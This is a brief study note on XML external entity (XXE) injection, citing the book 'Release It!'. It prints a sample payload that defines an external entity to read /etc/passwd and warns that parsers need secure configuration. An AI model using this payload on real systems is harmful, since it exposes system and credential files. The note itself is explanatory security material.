XML external entity (XXE) injection

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "<file:///etc/passwd>">
]>
<foo>&xxe;</foo>
Most xml parsers are vulnerable to XXE injection by default.
You need to configure them to be safe

(src: Book: release it! - Michael Nygard)